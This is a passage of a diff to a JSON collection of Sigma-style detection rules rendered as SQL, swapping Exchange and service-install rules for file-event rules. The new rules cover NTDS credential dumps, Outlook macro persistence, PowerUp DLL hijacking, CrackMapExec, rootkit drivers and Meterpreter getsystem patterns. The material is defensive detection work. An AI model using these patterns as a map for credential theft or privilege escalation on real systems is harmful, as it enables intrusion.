"medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Provider_Name = 'Microsoft-Windows-NTLM/Operational' AND EventID = '8004' AND WorkstationName IN ('Rdesktop', 'Remmina', 'Freerdp', 'Windows7', 'Windows8', 'Windows2012', 'Windows2016', 'Windows2019'))" + "SELECT * FROM logs WHERE (TargetFilename LIKE '%\\\\All.cab' ESCAPE '\\' OR TargetFilename LIKE '%.ntds.cleartext' ESCAPE '\\')" ], - "filename": "win_susp_ntlm_brute_force.yml" + "filename": "file_event_win_ntds_exfil_tools.yml" }, { - "title": "Remove Exported Mailbox from Exchange Webserver", - "id": "09570ae5-889e-43ea-aac0-0e1221fb3d95", + "title": "New Outlook Macro Created", + "id": "8c31f563-f9a7-450c-bfa8-35f8f32f1f61", "status": "test", - "description": "Detects removal of an exported Exchange mailbox which could be to cover tracks from ProxyShell exploit", - "author": "Christian Burkard (Nextron Systems)", + "description": "Detects the creation of a macro file for Outlook.", + "author": "@ScoubiMtl", "tags": [ - "attack.defense_evasion", - "attack.t1070" + "attack.persistence", + "attack.command_and_control", + "attack.t1137", + "attack.t1008", + "attack.t1546" ], "falsepositives": [ - "Unknown" + "User genuinely creates a VB Macro for their email" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'MSExchange Management' AND = 'Remove-MailboxExportRequest' AND = ' -Identity ' AND = ' -Confirm \"False\"')" + "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\outlook.exe' ESCAPE '\\' AND TargetFilename LIKE '%\\\\Microsoft\\\\Outlook\\\\VbaProject.OTM' ESCAPE '\\')" ], - "filename": "win_exchange_proxyshell_remove_mailbox_export.yml" + "filename": "file_event_win_office_outlook_macro_creation.yml" }, { - "title": "Possible Exploitation of Exchange RCE CVE-2021-42321", - "id": "c92f1896-d1d2-43c3-92d5-7a5b35c217bb", + "title": "Suspicious Files in Default GPO Folder", + "id": "5f87308a-0a5b-4623-ae15-d8fa1809bc60", "status": "experimental", - "description": "Detects log entries that appear in exploitation attempts against MS Exchange RCE CVE-2021-42321", - "author": "Florian Roth (Nextron Systems), @testanull", + "description": "Detects the creation of copy of suspicious files (EXE/DLL) to the default GPO storage folder", + "author": "elhoim", "tags": [ - "attack.lateral_movement", - "attack.t1210" + "attack.t1036.005", + "attack.defense_evasion" ], "falsepositives": [ - "Unknown, please report false positives via https://github.com/SigmaHQ/sigma/issues" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'MSExchange Management' AND EventID IN ('6', '8') AND (Data LIKE '%Cmdlet failed. Cmdlet Get-App, %' ESCAPE '\\' OR Data LIKE '%Task Get-App throwing unhandled exception: System.InvalidCastException:%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (TargetFilename LIKE '%\\\\Policies\\\\{31B2F340-016D-11D2-945F-00C04FB984F9}\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.exe' ESCAPE '\\'))" ], - "filename": "win_exchange_cve_2021_42321.yml" + "filename": "file_event_win_susp_default_gpo_dir_write.yml" }, { - "title": "Exchange Set OabVirtualDirectory ExternalUrl Property", - "id": "9db37458-4df2-46a5-95ab-307e7f29e675", + "title": "Powerup Write Hijack DLL", + "id": "602a1f13-c640-4d73-b053-be9a2fa58b96", "status": "test", - "description": "Rule to detect an adversary setting OabVirtualDirectory External URL property to a script in Exchange Management log", - "author": "Jose Rodriguez @Cyb3rPandaH", + "description": "Powerup tool's Write Hijack DLL exploits DLL hijacking for privilege escalation.\nIn it's default mode, it builds a self deleting .bat file which executes malicious command.\nThe detection rule relies on creation of the malicious bat file (debug.bat by default).\n", + "author": "Subhash Popuri (@pbssubhash)", "tags": [ "attack.persistence", - "attack.t1505.003" + "attack.privilege_escalation", + "attack.defense_evasion", + "attack.t1574.001" ], "falsepositives": [ - "Unknown" + "Any powershell script that creates bat files" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'MSExchange Management' AND = 'Set-OabVirtualDirectory' AND = 'ExternalUrl' AND LIKE 'Page\\_Load' ESCAPE '\\' AND = 'script')" + "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND TargetFilename LIKE '%.bat' ESCAPE '\\')" ], - "filename": "win_exchange_set_oabvirtualdirectory_externalurl.yml" + "filename": "file_event_win_hktl_powerup_dllhijacking.yml" }, { - "title": "Failed MSExchange Transport Agent Installation", - "id": "c7d16cae-aaf3-42e5-9c1c-fb8553faa6fa", - "status": "experimental", - "description": "Detects a failed installation of a Exchange Transport Agent", - "author": "Tobias Michalski (Nextron Systems)", + "title": "Suspicious desktop.ini Action", + "id": "81315b50-6b60-4d8f-9928-3466e1022515", + "status": "test", + "description": "Detects unusual processes accessing desktop.ini, which can be leveraged to alter how Explorer displays a folder's content (i.e. renaming files) without changing them on disk.", + "author": "Maxime Thiebaut (@0xThiebaut), Tim Shelton (HAWK.IO)", "tags": [ "attack.persistence", - "attack.t1505.002" + "attack.t1547.009" ], "falsepositives": [ - "Legitimate installations of exchange TransportAgents. AssemblyPath is a good indicator for this." + "Operations performed through Windows SCCM or equivalent", + "Read only access list authority" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'MSExchange Management' AND EventID = '6' AND Data LIKE '%Install-TransportAgent%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (TargetFilename LIKE '%\\\\desktop.ini' ESCAPE '\\' AND NOT (((NewProcessName LIKE 'C:\\\\Windows\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\')) OR (NewProcessName LIKE '%\\\\AppData\\\\Local\\\\JetBrains\\\\Toolbox\\\\bin\\\\7z.exe' ESCAPE '\\' AND TargetFilename LIKE '%\\\\JetBrains\\\\apps\\\\%' ESCAPE '\\') OR (TargetFilename LIKE 'C:\\\\$WINDOWS.~BT\\\\NewOS\\\\%' ESCAPE '\\')))" ], - "filename": "win_exchange_transportagent_failed.yml" + "filename": "file_event_win_susp_desktop_ini.yml" }, { - "title": "MSExchange Transport Agent Installation - Builtin", - "id": "4fe151c2-ecf9-4fae-95ae-b88ec9c2fca6", + "title": "TeamViewer Remote Session", + "id": "162ab1e4-6874-4564-853c-53ec3ab8be01", "status": "test", - "description": "Detects the Installation of a Exchange Transport Agent", - "author": "Tobias Michalski (Nextron Systems)", + "description": "Detects the creation of log files during a TeamViewer remote session", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1505.002" + "attack.command_and_control", + "attack.t1219" ], "falsepositives": [ - "Legitimate installations of exchange TransportAgents. AssemblyPath is a good indicator for this." + "Legitimate uses of TeamViewer in an organisation" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'MSExchange Management' AND logs MATCH ('\"Install-TransportAgent\"'))" + "SELECT * FROM logs WHERE ((TargetFilename LIKE '%\\\\TeamViewer\\\\RemotePrinting\\\\tvprint.db' ESCAPE '\\' OR TargetFilename LIKE '%\\\\TeamViewer\\\\TVNetwork.log' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\TeamViewer%' ESCAPE '\\' AND TargetFilename LIKE '%\\_Logfile.log%' ESCAPE '\\'))" ], - "filename": "win_exchange_transportagent.yml" + "filename": "file_event_win_susp_teamviewer_remote_session.yml" }, { - "title": "File Was Not Allowed To Run", - "id": "401e5d00-b944-11ea-8f9a-00163ecd60ae", - "status": "test", - "description": "Detect run not allowed files. Applocker is a very useful tool, especially on servers where unprivileged users have access. For example terminal servers. You need configure applocker and log collect to receive these events.", - "author": "Pushkarev Dmitry", + "title": "OneNote Attachment File Dropped In Suspicious Location", + "id": "7fd164ba-126a-4d9c-9392-0d4f7c243df0", + "status": "experimental", + "description": "Detects creation of files with the \".one\"/\".onepkg\" extension in suspicious or uncommon locations. This could be a sign of attackers abusing OneNote attachments", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1204.002", - "attack.t1059.001", - "attack.t1059.003", - "attack.t1059.005", - "attack.t1059.006", - "attack.t1059.007" + "attack.defense_evasion" ], "falsepositives": [ - "Need tuning applocker or add exceptions in SIEM" + "Legitimate usage of \".one\" or \".onepkg\" files from those locations" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel IN ('Microsoft-Windows-AppLocker/MSI and Script', 'Microsoft-Windows-AppLocker/EXE and DLL', 'Microsoft-Windows-AppLocker/Packaged app-Deployment', 'Microsoft-Windows-AppLocker/Packaged app-Execution') AND EventID IN ('8004', '8007', '8022', '8025'))" + "SELECT * FROM logs WHERE ((TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Temp\\\\%' ESCAPE '\\') AND (TargetFilename LIKE '%.one' ESCAPE '\\' OR TargetFilename LIKE '%.onepkg' ESCAPE '\\'))" ], - "filename": "win_applocker_file_was_not_allowed_to_run.yml" + "filename": "file_event_win_office_onenote_files_in_susp_locations.yml" }, { - "title": "OpenSSH Server Listening On Socket", - "id": "3ce8e9a4-bc61-4c9b-8e69-d7e2492a8781", + "title": "Drop Binaries Into Spool Drivers Color Folder", + "id": "ce7066a6-508a-42d3-995b-2952c65dc2ce", "status": "experimental", - "description": "Detects scenarios where an attacker enables the OpenSSH server and server starts to listening on SSH socket.", - "author": "mdecrevoisier", + "description": "Detects the creation of suspcious binary files inside the \"\\windows\\system32\\spool\\drivers\\color\\\" as seen in the blog referenced below", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.lateral_movement", - "attack.t1021.004" + "attack.defense_evasion" ], "falsepositives": [ - "Legitimate administrator activity" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4' AND process = 'sshd' AND payload LIKE 'Server listening on %' ESCAPE '\\')" + "SELECT * FROM logs WHERE (TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\spool\\\\drivers\\\\color\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.exe' ESCAPE '\\' OR TargetFilename LIKE '%.sys' ESCAPE '\\'))" ], - "filename": "win_sshd_openssh_server_listening_on_socket.yml" + "filename": "file_event_win_susp_spool_drivers_color_drop.yml" }, { - "title": "DNS Server Error Failed Loading the ServerLevelPluginDLL", - "id": "cbe51394-cd93-4473-b555-edf0144952d9", - "status": "test", - "description": "Detects a DNS server error in which a specified plugin DLL (in registry) could not be loaded", - "author": "Florian Roth (Nextron Systems)", + "title": "RDP File Creation From Suspicious Application", + "id": "fccfb43e-09a7-4bd2-8b37-a5a7df33386d", + "status": "experimental", + "description": "Detects Rclone config file being created", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1574.002" + "attack.defense_evasion" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'DNS Server' AND EventID IN ('150', '770', '771'))" + "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\brave.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\CCleaner Browser\\\\Application\\\\CCleanerBrowser.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\chromium.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\firefox.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\iexplore.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\microsoftedge.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msedge.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Opera.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Vivaldi.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Whale.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Outlook.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\RuntimeBroker.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Thunderbird.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Discord.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Keybase.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msteams.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Slack.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\teams.exe' ESCAPE '\\') AND TargetFilename LIKE '%.rdp%' ESCAPE '\\')" ], - "filename": "win_dns_server_susp_server_level_plugin_dll.yml" + "filename": "file_event_win_rdp_file_susp_creation.yml" }, { - "title": "NetSupport Manager Service Install", - "id": "2d510d8d-912b-45c5-b1df-36faa3d8c3f4", - "status": "experimental", - "description": "Detects NetSupport Manager service installation on the target system.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "InstallerFileTakeOver LPE CVE-2021-41379 File Create Event", + "id": "3be82d5d-09fe-4d6a-a275-0d40d234d324", + "status": "test", + "description": "Detects signs of the exploitation of LPE CVE-2021-41379 that include an msiexec process that creates an elevation_service.exe file", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence" + "attack.privilege_escalation", + "attack.t1068" ], "falsepositives": [ - "Legitimate use of the tool" + "Unknown", + "Possibly some Microsoft Edge upgrades" ], - "level": "medium", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7045') AND (ImagePath LIKE '%\\\\NetSupport Manager\\\\client32.exe%' ESCAPE '\\' OR ServiceName = 'Client32'))" + "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\msiexec.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\Edge\\\\Application%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\elevation\\_service.exe' ESCAPE '\\')" ], - "filename": "win_system_service_install_netsupport_manager.yml" + "filename": "file_event_win_cve_2021_41379_msi_lpe.yml" }, { - "title": "Suspicious Service Installation Script", - "id": "70f00d10-60b2-4f34-b9a0-dc3df3fe762a", - "status": "experimental", - "description": "Detects suspicious service installation scripts", - "author": "pH-T (Nextron Systems)", + "title": "Moriya Rootkit", + "id": "a1507d71-0b60-44f6-b17c-bf53220fdd88", + "status": "test", + "description": "Detects the use of Moriya rootkit as described in the securelist's Operation TunnelSnake report", + "author": "Bhabesh Raj", "tags": [ "attack.persistence", "attack.privilege_escalation", - "car.2013-09-005", "attack.t1543.003" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND (ImagePath LIKE '% /c %' ESCAPE '\\' OR ImagePath LIKE '% /r %' ESCAPE '\\' OR ImagePath LIKE '% /k %' ESCAPE '\\') AND (ImagePath LIKE '%powershell%' ESCAPE '\\' OR ImagePath LIKE '%pwsh%' ESCAPE '\\' OR ImagePath LIKE '%wscript%' ESCAPE '\\' OR ImagePath LIKE '%cscript%' ESCAPE '\\' OR ImagePath LIKE '%mshta%' ESCAPE '\\' OR ImagePath LIKE '%rundll32%' ESCAPE '\\' OR ImagePath LIKE '%regsvr32%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\drivers\\\\MoriyaStreamWatchmen.sys' ESCAPE '\\'" ], - "filename": "win_system_susp_service_installation_script.yml" + "filename": "file_event_win_moriya_rootkit.yml" }, { - "title": "Local Privilege Escalation Indicator TabTip", - "id": "bc2e25ed-b92b-4daa-b074-b502bdd1982b", + "title": "CrackMapExec File Creation Patterns", + "id": "9433ff9c-5d3f-4269-99f8-95fc826ea489", "status": "experimental", - "description": "Detects the invocation of TabTip via CLSID as seen when JuicyPotatoNG is used on a system in brute force mode", + "description": "Detects suspicious file creation patterns found in logs when CrackMapExec is used", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1557.001" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND EventID = '10001' AND param1 LIKE 'C:\\\\Program Files\\\\Common Files\\\\microsoft shared\\\\ink\\\\TabTip.exe' ESCAPE '\\' AND param2 = '2147943140' AND param3 = '{054AAE20-4BEA-4347-8A35-64A533254A9D}')" + "SELECT * FROM logs WHERE ((TargetFilename LIKE 'C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' AND NewProcessName LIKE 'C:\\\\WINDOWS\\\\system32\\\\rundll32.exe' ESCAPE '\\' AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\') AND (TargetFilename LIKE '%.rtf' ESCAPE '\\' OR TargetFilename LIKE '%.otf' ESCAPE '\\' OR TargetFilename LIKE '%.odt' ESCAPE '\\' OR TargetFilename LIKE '%.txt' ESCAPE '\\' OR TargetFilename LIKE '%.doc' ESCAPE '\\' OR TargetFilename LIKE '%.pdf' ESCAPE '\\' OR TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.docx' ESCAPE '\\' OR TargetFilename LIKE '%.wpd' ESCAPE '\\' OR TargetFilename LIKE '%.icns' ESCAPE '\\' OR TargetFilename LIKE '%.db' ESCAPE '\\' OR TargetFilename LIKE '%.ini' ESCAPE '\\' OR TargetFilename LIKE '%.tex' ESCAPE '\\' OR TargetFilename LIKE '%.sys' ESCAPE '\\' OR TargetFilename LIKE '%.csv' ESCAPE '\\' OR TargetFilename LIKE '%.fon' ESCAPE '\\' OR TargetFilename LIKE '%.tar' ESCAPE '\\' OR TargetFilename LIKE '%.ttf' ESCAPE '\\' OR TargetFilename LIKE '%.xml' ESCAPE '\\' OR TargetFilename LIKE '%.cfg' ESCAPE '\\' OR TargetFilename LIKE '%.cpl' ESCAPE '\\' OR TargetFilename LIKE '%.jpg' ESCAPE '\\' OR TargetFilename LIKE '%.drv' ESCAPE '\\' OR TargetFilename LIKE '%.cur' ESCAPE '\\' OR TargetFilename LIKE '%.tmp' ESCAPE '\\')) OR (TargetFilename LIKE 'C:\\\\Windows\\\\Temp\\\\procdump.exe' ESCAPE '\\' AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')))" ], - "filename": "win_system_lpe_indicators_tabtip.yml" + "filename": "file_event_win_crackmapexec_patterns.yml" }, { - "title": "Meterpreter or Cobalt Strike Getsystem Service Installation - System", - "id": "843544a7-56e0-4dcc-a44f-5cc266dd97d6", - "status": "experimental", - "description": "Detects the use of getsystem Meterpreter/Cobalt Strike command by detecting a specific service installation", - "author": "Teymur Kheirkhabarov, Ecco, Florian Roth", + "title": "Files With System Process Name In Unsuspected Locations", + "id": "d5866ddf-ce8f-4aea-b28e-d96485a20d3d", + "status": "test", + "description": "Detects the creation of an executable with a system process name in folders other than the system ones (System32, SysWOW64...etc).", + "author": "Sander Wiebing, Tim Shelton, Nasreddine Bencherchali", "tags": [ - "attack.privilege_escalation", - "attack.t1134.001", - "attack.t1134.002" + "attack.defense_evasion", + "attack.t1036.005" ], "falsepositives": [ - "Highly unlikely" + "System processes copied outside their default folders for testing purposes", + "Third party software naming their software with the same names as the processes mentioned here" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7045') AND ((ImagePath LIKE '%cmd%' ESCAPE '\\' AND ImagePath LIKE '%/c%' ESCAPE '\\' AND ImagePath LIKE '%echo%' ESCAPE '\\' AND ImagePath LIKE '%\\\\pipe\\\\%' ESCAPE '\\') OR (ImagePath LIKE '%\\%COMSPEC\\%%' ESCAPE '\\' AND ImagePath LIKE '%/c%' ESCAPE '\\' AND ImagePath LIKE '%echo%' ESCAPE '\\' AND ImagePath LIKE '%\\\\pipe\\\\%' ESCAPE '\\') OR (ImagePath LIKE '%cmd.exe%' ESCAPE '\\' AND ImagePath LIKE '%/c%' ESCAPE '\\' AND ImagePath LIKE '%echo%' ESCAPE '\\' AND ImagePath LIKE '%\\\\pipe\\\\%' ESCAPE '\\') OR (ImagePath LIKE '%rundll32%' ESCAPE '\\' AND ImagePath LIKE '%.dll,a%' ESCAPE '\\' AND ImagePath LIKE '%/p:%' ESCAPE '\\') OR ImagePath LIKE '\\\\\\\\127.0.0.1\\\\ADMIN$\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((TargetFilename LIKE '%\\\\AtBroker.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\audiodg.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\backgroundTaskHost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\bcdedit.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\cmdl32.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\cmstp.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\conhost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\csrss.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\dasHost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\dfrgui.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\dllhost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\dwm.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\eventcreate.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\eventvwr.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\explorer.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\extrac32.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\fontdrvhost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\ipconfig.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\iscsicli.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\iscsicpl.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\logman.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\LogonUI.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\LsaIso.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\lsass.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\lsm.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\msinfo32.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\mstsc.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\nbtstat.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\odbcconf.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\powershell.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\regini.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\RuntimeBroker.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SearchFilterHost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SearchIndexer.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SearchProtocolHost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SecurityHealthService.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SecurityHealthSystray.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\services.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\ShellAppRuntime.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sihost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\smartscreen.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\smss.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\spoolsv.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\svchost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SystemSettingsBroker.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\taskhost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\taskhostw.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Taskmgr.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\TiWorker.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\vssadmin.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\w32tm.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WerFault.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WerFaultSecure.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wermgr.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wevtutil.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wininit.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\winlogon.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\winrshost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WinRTNetMUAHostServer.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wlanext.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wlrmdr.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WmiPrvSE.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wslhost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WSReset.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WUDFHost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WWAHost.exe' ESCAPE '\\') AND NOT (((TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\SoftwareDistribution\\\\%' ESCAPE '\\' OR TargetFilename LIKE '\\\\SystemRoot\\\\System32\\\\%' ESCAPE '\\') AND (NewProcessName LIKE '%\\\\Windows\\\\System32\\\\dism.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\TiWorker.exe' ESCAPE '\\')) OR (TargetFilename LIKE 'C:\\\\$WINDOWS.~BT\\\\%' ESCAPE '\\' AND NewProcessName LIKE 'C:\\\\$WINDOWS.~BT\\\\Sources\\\\SetupHost.exe' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\RuntimeBroker.exe' ESCAPE '\\' AND NewProcessName LIKE 'C:\\\\Windows\\\\system32\\\\wbengine.exe' ESCAPE '\\') OR (NewProcessName LIKE '%:\\\\Windows\\\\system32\\\\svchost.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:\\\\Windows\\\\SoftwareDistribution\\\\Download\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%\\\\spoolsv.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\bcdedit.exe' ESCAPE '\\')) OR (NewProcessName LIKE '%:\\\\Windows\\\\system32\\\\svchost.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:Program Files\\\\WindowsApps\\\\%' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\wuauclt.exe' ESCAPE '\\') OR (TargetFilename LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\WINDOWS\\\\system32\\\\msiexec.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:\\\\Program Files\\\\PowerShell\\\\7\\\\pwsh.exe' ESCAPE '\\') OR (TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\SecurityHealth\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\SecurityHealthSystray.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\SecurityHealthSetup.exe' ESCAPE '\\')))" ], - "filename": "win_system_meterpreter_or_cobaltstrike_getsystem_service_installation.yml" + "filename": "file_event_win_creation_system_file.yml" }, { - "title": "KrbRelayUp Service Installation", - "id": "e97d9903-53b2-41fc-8cb9-889ed4093e80", - "status": "experimental", - "description": "Detects service creation from KrbRelayUp tool used for privilege escalation in windows domain environments where LDAP signing is not enforced (the default settings)", - "author": "Sittikorn S, Tim Shelton", + "title": "UAC Bypass Using .NET Code Profiler on MMC", + "id": "93a19907-d4f9-4deb-9f91-aac4692776a6", + "status": "test", + "description": "Detects the pattern of UAC Bypass using .NET Code Profiler and mmc.exe DLL hijacking (UACMe 39)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ + "attack.defense_evasion", "attack.privilege_escalation", - "attack.t1543" + "attack.t1548.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND EventID = '7045' AND ServiceName = 'KrbSCM')" + "SELECT * FROM logs WHERE (TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE 